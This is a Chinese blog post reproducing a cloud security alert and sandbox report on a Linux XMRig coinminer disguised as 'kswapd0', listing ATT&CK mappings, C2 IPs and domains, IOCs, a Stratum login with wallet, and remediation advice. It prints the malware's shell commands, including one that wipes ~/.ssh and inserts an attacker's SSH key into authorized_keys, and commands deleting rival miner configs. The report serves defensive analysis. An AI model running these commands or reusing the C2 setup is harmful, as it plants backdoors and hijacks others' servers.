挖矿行为 爆破root账号

 

1
 
初始访问
 
2
 
执行
执行命令/脚本
2
维护(恶意)进程稳定性
1
3
 
持久化
 
4
 
特权提升
进程注入
2
5
 
防御绕过
进程注入
2
文件(数据)混淆
1
6
 
凭据访问
获取主机账户(密码)
1
7
 
披露
网络连接(探测)
9
系统信息发现
30
网络连接(探测)
2
获取/proc信息
1
系统网络配置信息发现
1
(可能)主机IP扫描
1
8
 
横向移动
获取主机账户(密码)
1
网络连接(探测)
9
(可能)主机IP扫描
1
9
 
收集
 
10
 
命令与控制
 
11
 
数据渗漏
 
12
 
影响

 

 

 

 

 

 

 

 

  • 行为标签
  • 进程详情
  • 网络行为
  • 文件行为
  • ATT&CK矩阵
网络行为特征
连接多个IP(可能在IP扫描)
   
恶意行为特征
发现恶意文件配置信息
   
静态文件特征
文件/内存匹配到YARA规则
   
   
网络行为特征
识别到Stratum协议(可能是挖矿)
   
文件行为特征
读/etc/passwd文件
   
静态文件特征
检测到条件竞争利用静态特征
 
静态文件特征
文件包含IOC信息
   
可疑行为特征
读/proc/mounts文件(寻找可写的文件系统)
   
静态文件特征
文件被加壳混淆
   
可疑行为特征
运行时分配(修改)得到可执行内存
   
   
静态文件特征
文件/内存匹配到YARA规则
   
   
   
   
   
   
文件行为特征
删除文件
   
   
   
   
   
信息收集行为
获取内核(版本)信息
   
信息收集行为
获取网络设备(配置)信息
   
一般行为
通过Bash执行命令
   
   
静态文件特征
该文件是静态链接的
 
信息收集行为
获取系统(设备)版本信息
   
信息收集行为
获取CPU信息(可能有DDos能力)
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
信息收集行为
获取系统内存(状态)信息

 

 

 

 

 

 

 

网络行为特征
连接多个IP(可能在IP扫描)
IP扫描
More than 6: 179.43.139.84:80, 179.43.155.134:80, 88.218.17.122:80, 185.165.169.188:80, 185.247.224.154:80, work.debian-package.org:80 ...
恶意行为特征
发现恶意文件配置信息
配置详情
{\"C2\": [\"179.43.139.84:80\", \"179.43.155.134:80\", \"88.218.17.122:80\", \"185.165.169.188:80\", \"185.165.169.188:443\", \"185.247.224.154:80\", \"work.debian-package.org:80\", \"work.ubuntu-package.org:443\", \"45.9.150.161:443\"]}
静态文件特征
文件/内存匹配到YARA规则
内存中字符串包含已知特征
"Miner_XMRig","Miner_XmrMiner"
内存中包含已知特征
"Miner_XMRig","Miner_XmrMiner"
网络行为特征
识别到Stratum协议(可能是挖矿)
Stratum流量
{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"483fmPjXwX75xmkaJ3dm4vVGWZLHn3GDuKycHypVLr9SgiT6oaZgVh26iZRpwKEkTZCAmUS8tykuwUorM3zGtWxPBFqwuxS\",\"pass\":\"x\",\"agent\":\"XMRig/6.19.0 (Linux x8
文件行为特征
读/etc/passwd文件
读文件
/etc/passwd
静态文件特征
检测到条件竞争利用静态特征
 
静态文件特征
文件包含IOC信息
文件/内存中IOC信息
"https://xmrig.com/wizard","185.165.169.188","https://xmrig.com/docs/algorithms","192.0.140.123","185.247.224.154:80","179.43.155.134:80","192.0.10.123","45.9.150.161","88.218.17.122","179.43.139.84","185.165.169.188:443","88.218.17.122:80","https://gcc.gnu.org/bugs/","185.165.169.188:80","185.247.224.154","179.43.155.134","179.43.139.84:80","127.0.0.1","45.9.150.161:443"
可疑行为特征
读/proc/mounts文件(寻找可写的文件系统)
读文件
/proc/1304/mounts
静态文件特征
文件被加壳混淆
加壳信息
UPX(3.96)[NRV,brute]
可疑行为特征
运行时分配(修改)得到可执行内存
分配可执行内存(可能是加壳)
  
分配可执行内存(可能是加壳)
  
静态文件特征
文件/内存匹配到YARA规则
静态文件命中规则
MD5_Constants
静态文件命中规则
RIPEMD160_Constants
静态文件命中规则
SHA1_Constants
静态文件命中规则
SHA512_Constants
静态文件命中规则
SHA2_BLAKE2_IVs
静态文件命中规则
SipHash_big_endian_constants
文件行为特征
删除文件
删除文件
/root/config
删除文件
/root/authorized_keys
删除文件
/root/known_hosts
删除文件
/root/.xmrig.json
删除文件
/root/.config/xmrig.json
信息收集行为
获取内核(版本)信息
执行uname命令
  
信息收集行为
获取网络设备(配置)信息
获取系统网络信息
/etc/hosts
一般行为
通过Bash执行命令
执行bash命令
sh -c chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json
执行bash命令
sh -c cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
静态文件特征
该文件是静态链接的
 
信息收集行为
获取系统(设备)版本信息
获取系统(版本)信息
/usr/share/locale/locale.alias
信息收集行为
获取CPU信息(可能有DDos能力)
读文件
/proc/cpuinfo
读文件
/sys/devices/system/cpu/online
读文件
/sys/devices/system/cpu/cpu0/topology/core_cpus
读文件
/sys/devices/system/cpu/cpu0/topology/core_id
读文件
/sys/devices/system/cpu/cpu0/topology/die_cpus
读文件
/sys/devices/system/cpu/cpu0/topology/package_cpus
读文件
/sys/devices/system/cpu/cpu0/topology/physical_package_id
读文件
/sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_map
读文件
/sys/devices/system/cpu/cpu0/cache/index0/level
读文件
/sys/devices/system/cpu/cpu0/cache/index0/type
读文件
/sys/devices/system/cpu/cpu0/cache/index0/id
读文件
/sys/devices/system/cpu/cpu0/cache/index0/size
读文件
/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size
读文件
/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets
读文件
/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition
读文件
/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map
读文件
/sys/devices/system/cpu/cpu0/cache/index1/level
读文件
/sys/devices/system/cpu/cpu0/cache/index1/type
读文件
/sys/devices/system/cpu/cpu0/cache/index1/id
读文件
/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map
读文件
/sys/devices/system/cpu/cpu0/cache/index2/level
读文件
/sys/devices/system/cpu/cpu0/cache/index2/type
读文件
/sys/devices/system/cpu/cpu0/cache/index2/id
读文件
/sys/devices/system/cpu/cpu0/cache/index2/size
读文件
/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size
读文件
/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets
读文件
/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition
读文件
/sys/devices/system/cpu/possible
信息收集行为
获取系统内存(状态)信息
获取系统内存(状态)信息
/proc/meminfo

 

 

 

 

 

 

告警描述:检测模型发现您的服务器上运行了挖矿程序,挖矿程序是一类侵占主机计算资源,进行虚拟货币挖掘的程序,主机往往可见CPU占用飙高,以及其它相关的恶意程序。
异常事件详情

提示:在您的系统磁盘上发现了可疑文件,建议您先确认文件合法性并进行处理。

文件路径:/home/dmdba/.configrc5/a/kswapd0

恶意文件md5:8da798989b6e48fb211674b652119a8c

扫描来源方式: 进程启动扫描

检测方式:云查杀

进程id: 9375

进程命令行: ./kswapd0

文件创建用户: N/A

文件修改时间: 2023-12-15 02:46:01

样本家族与特征:Miner:Linux/CoinMiner

描述:通常黑客入侵后会植入挖矿程序赚取收益,该类程序占用CPU等资源,影响用户正常业务,危害较大。且该程序可能还存在自删除行为,或伪装成系统程序以躲避检测。

处置建议:如果您确认该文件不是自己部署的业务所需文件,建议点击【处理】-> 【病毒查杀-结束进程并隔离文件】-> 【立即处理】,将终止恶意进程并隔离恶意文件。如果该文件不存在,请检查是否存在可疑进程、定时任务或启动项。 如果您确认该文件是自身业务文件,是误报,建议点击【处理】-> 【加白名单】-> 【立即处理】,后续将不会产生该文件告警。

 

 

 

 

 

posted @ 2023-12-15 12:08  papering  阅读(40)  评论(0编辑  收藏  举报